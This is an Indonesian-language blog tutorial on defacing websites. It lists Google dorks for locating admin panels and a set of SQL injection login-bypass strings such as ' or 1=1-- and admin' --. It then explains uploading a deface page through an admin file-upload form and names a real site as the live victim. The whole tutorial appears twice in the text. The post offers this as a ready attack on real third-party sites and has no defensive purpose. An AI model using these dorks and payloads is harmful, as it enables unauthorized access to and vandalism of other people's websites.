Tutorial cara deface bypass admin with dork + live target!!!
Halo sobat kembali lagi bersama saya SantriSulsel oke kali ini saya akan membagikan tutorial cara bypass admin with dork plus live target oke sebelum itu kita harus tau apa itu deface berikut penjelasannya :
Deface adalah salah satu kegiatan untuk merubah tampilan website baik itu file index, atau file yg terkait dalam website tersebut.
Nah pada teknik ini (Bypass Admin) kita memanfaatkan sebuah bug (celah) pada website dimana kita dapat login sebagai admin hanya dengan memasukkan username dan password tertentu pada login page (halaman login) admin. Nah sekarang udah taukan apa itu deface dan teknik bypass admin, oke kita langsung saja ke tutorialnya
Pertama bahan yg kita butuhkan adalah sebuah dork. Berikut dork yang saya sediakan :
inurl:/admin/Dashboard.php
inurl:/panel/Dashboard.php
inurl:/admin/index.php intext:username
inurl:/admin/Admin.php intext:login
inurl:/admin/img/ "products"
Nah selebihnya kalian kembangin sendiri ya. Oke kita ke tutorialnya
Seperti biasa pertama-tama kalian ngedorking di goole dulu ya tetapi disini saya sudah mendapatkan target
Nah setelah mendapat target kalian isi username dan password yg ada di bawah ini
Catatan: coba satu persatu jika tidak ada yang berhasil berarti tidak vuln
' or 1=1 limit 1 -- -+
'="or'
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
' or 'x
'='x" or "x
"="x
'=''or'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
Nah jika vuln kalian akan masuk ke dashboard admin pada bagian ini kalian tinggal mencari tempat upload dimana tempat admin biasa mengupload sebuah file
Disini saya menemukan tempat upload di bagian (Add New Category). Nah kalian tinggal cari tombol upload lau kalian up script deface kalian ya
Kalian tinggal upload script deface kalian. Setelah upload kalian upload kalian tinggal klick update di bawah ya.
Setelah selesai gimana cara aksesnya?kalian ubah linknya menjadi http://www.fairytales.net.in/admin/category-images/namascriptkalian.html
dan lihat hasilnya website berhasil di deface
Mungkin sekian dari tutorial saya jika ada yang ingin ditanyakan silahkan kometar dibawah ya. See you in next tutorial bye :D
Deface adalah salah satu kegiatan untuk merubah tampilan website baik itu file index, atau file yg terkait dalam website tersebut.
Nah pada teknik ini (Bypass Admin) kita memanfaatkan sebuah bug (celah) pada website dimana kita dapat login sebagai admin hanya dengan memasukkan username dan password tertentu pada login page (halaman login) admin. Nah sekarang udah taukan apa itu deface dan teknik bypass admin, oke kita langsung saja ke tutorialnya
Pertama bahan yg kita butuhkan adalah sebuah dork. Berikut dork yang saya sediakan :
inurl:/admin/Dashboard.php
inurl:/panel/Dashboard.php
inurl:/admin/index.php intext:username
inurl:/admin/Admin.php intext:login
inurl:/admin/img/ "products"
Nah selebihnya kalian kembangin sendiri ya. Oke kita ke tutorialnya
Seperti biasa pertama-tama kalian ngedorking di goole dulu ya tetapi disini saya sudah mendapatkan target
Nah setelah mendapat target kalian isi username dan password yg ada di bawah ini
Catatan: coba satu persatu jika tidak ada yang berhasil berarti tidak vuln
' or 1=1 limit 1 -- -+
'="or'
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
' or 'x
'='x" or "x
"="x
'=''or'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
Nah jika vuln kalian akan masuk ke dashboard admin pada bagian ini kalian tinggal mencari tempat upload dimana tempat admin biasa mengupload sebuah file
Disini saya menemukan tempat upload di bagian (Add New Category). Nah kalian tinggal cari tombol upload lau kalian up script deface kalian ya
Kalian tinggal upload script deface kalian. Setelah upload kalian upload kalian tinggal klick update di bawah ya.
Setelah selesai gimana cara aksesnya?kalian ubah linknya menjadi http://www.fairytales.net.in/admin/category-images/namascriptkalian.html
dan lihat hasilnya website berhasil di deface
Mungkin sekian dari tutorial saya jika ada yang ingin ditanyakan silahkan kometar dibawah ya. See you in next tutorial bye :D
0 Response to "Tutorial cara deface bypass admin with dork + live target!!!"
Post a Comment